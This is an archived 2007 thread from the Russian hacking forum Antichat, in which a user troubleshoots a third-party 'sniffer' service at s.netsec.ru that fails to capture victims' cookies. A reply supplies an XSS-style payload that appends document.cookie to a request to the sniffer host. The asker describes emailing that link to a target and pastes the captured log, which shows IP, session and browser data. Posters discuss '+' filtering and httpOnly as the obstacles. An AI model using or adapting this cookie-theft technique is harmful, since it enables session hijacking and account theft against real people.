Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Снифер s.netsec.ru, cookie (https://forum.antichat.xyz/showthread.php?t=54089)

<<MEN>> 21.11.2007 20:12

Снифер s.netsec.ru, cookie
 
Скажите,пожалуйста почему сниффер от античата..
http://s.netsec.ru
Не тырит куки..?только Ип и ссесию..в чём проблема,подскажите.

DIAgen 21.11.2007 20:34

Цитата:

Сообщение от <<MEN>>
Скажите,пожалуйста почему сниффер от античата..
http://s.netsec.ru
Не тырит куки..?только Ип и ссесию..в чём проблема,подскажите.

Или ты не правильно что то делаешь.. прочитай заново доки.. или в куках только сессия находиться и все... третьево не дано... конечно если сам снифер не тупит)

<<MEN>> 22.11.2007 09:11

вроди всё правильно делаю..
http://s.netsec.ru/Ник.gif

Isis 22.11.2007 09:47

<<men>>, на нетсеке все норм работает + это не снифер античата

Zick 22.11.2007 13:21

если он ворует хотя бы сессию, значит сниффер работает и ты все правильно сделал. просто пользователь, который зашел на сниффер, был не авторизован.

GreenBear 22.11.2007 13:55

или у кук httpOnly

freddi 22.11.2007 14:46

Цитата:

Сообщение от <<MEN>>
вроди всё правильно делаю..
http://s.netsec.ru/Ник.gif

если нужны куки, то:
Цитата:

"http://s.netsec.ru/имя.gif?"+document.cookie;
к томуже может фильтроватся символ "+"

<<MEN>> 22.11.2007 16:09

ясно)Я сделал как тут говарилось отправил челу письмо со ссылкой сниффа http://s.netsec.ru/ник.gif?"+document.cookie;
И мне пришло:
Time: 22.11 -02.27.53
IP: тут ИП
Host: тут сессия
Browser:Имя браузера
String:" document.cookie;
получатся я так понял он куки не свиснул..

freddi 22.11.2007 17:29

"+" фильтруется.

<<MEN>> 22.11.2007 22:01

тогда получается сниффер бысмыселен..я так понимаю.
Потому,что ссесию если и сворует определение по кукам,куки свиснуть не сможет т.к. фильтрация..
Тока ИП.


Время: 17:20